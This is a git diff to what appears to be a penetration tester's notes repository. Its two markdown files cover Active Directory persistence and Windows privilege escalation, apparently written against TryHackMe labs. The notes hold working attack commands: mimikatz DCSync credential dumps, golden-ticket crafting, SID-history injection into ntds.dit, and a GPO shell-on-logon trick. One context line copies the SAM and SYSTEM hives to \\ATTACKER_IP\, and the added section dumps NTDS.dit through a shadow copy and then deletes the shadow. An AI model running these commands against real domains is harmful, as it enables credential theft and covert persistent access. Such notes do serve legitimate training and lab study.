diff --git a/Cryptography/Active Directory/AD Persistance.md b/Cryptography/Active Directory/AD Persistance.md
index 7ae4c90..326353f 100644
--- a/Cryptography/Active Directory/AD Persistance.md	
+++ b/Cryptography/Active Directory/AD Persistance.md	
@@ -1,9 +1,8 @@
 # Active Directory Persistance
 
-
 ## Using Credentials
 
-* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest 
+* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
 * __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
     * Credentials for multiple local administrators
     * Service account with delegation permissions
@@ -11,22 +10,27 @@
 
 ### Usage
 
-* Use mimikatz
+Use mimikatz
+
 ```sh
 lsadump::dcsync /domain:<domain> /user:<username>
 ```
-* To query the krbtgt user
+
+To query the krbtgt user
+
 ```sh
 lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
 ```
-* Query everything
+
+Query everything
+
 ```sh
 lsadump::dcsync /domain:<domain> /all
 ```
 
 ## Using Tickets
 
-* __Golden Ticket__ crafted TGT, 
+* __Golden Ticket__ crafted TGT,
     * Needs domain name, domain SID and a user ID to impersonate
     * Needs krbtgt NTLM to sign the ticket
     * krbtgt hash never rotates automatically, only refreshed manually
@@ -40,7 +44,7 @@ lsadump::dcsync /domain:<domain> /all
     * DC is never contacted, no contact to any TGT or KDC
     * Non existing user can be used with a local admin group's SID
 
-### Usage 
+### Usage
 
 * Craft a golden ticket
 ```sh
@@ -95,22 +99,24 @@ Get-ADUser <your ad username> -properties sidhistory,memberof
 ```sh
 Get-ADGroup "Domain Admins"
 ```
-* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
+
+Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
+
 ```sh
 Stop-Service -Name ntds -force
-Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit 
+Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
 Start-Service -Name ntds
 ```
 * Verify users SIDs
 ```sh
-Get-ADUser <username> -Properties sidhistory 
+Get-ADUser <username> -Properties sidhistory
 dir \\<dc.example.com>\C$\
 ```
 
 ## Using Group Memberships
 
 * Most are monitored security wise
-* Interesting group for persistence are 
+* Interesting group for persistence are
     * `IT Support`
     * Local administrational accounts
     * Groups with ownership over GPO
@@ -126,7 +132,7 @@ New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<userna
 ```
 * And nesting another one
 ```sh
-New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security 
+New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
 
 Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
 ```
@@ -154,7 +160,7 @@ Get-ADGroupMember -Identity "Domain Admins"
 
 * AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
     * Domain Admins
-    * Administrators 
+    * Administrators
     * Enterprise/Schema Administrator
 * SDProp as a process maps the ACLs to protected groups every hour
 
@@ -190,7 +196,7 @@ copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe &
 * Select the previously created batch script and PE
 * Catch the shell when an admin logs on
 
-* Once again open mmc 
+* Once again open mmc
 * Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
 * Click on every other group except Authenticated Users and remove them
 
diff --git a/Post Exploitation/Windows/Windows PrivEsc.md b/Post Exploitation/Windows/Windows PrivEsc.md
index 32fcdee..fd7b233 100644
--- a/Post Exploitation/Windows/Windows PrivEsc.md	
+++ b/Post Exploitation/Windows/Windows PrivEsc.md	
@@ -337,6 +337,17 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
 ```
 
+#### In case you are on a DC
+
+You can extract the AD database which stores every domain account and its password hash via Volume Shadow Copy Service. `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`.
+
+```sh
+vssadmin create shadow /for=C:
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\TEMP\ntds.dit
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\TEMP\system
+vssadmin delete shadows /shadow={$SHADOW_ID} /quiet
+```
+
 ### Dump LSASS
 
 LSASS contains multiple different credential types like NTLM password hashes,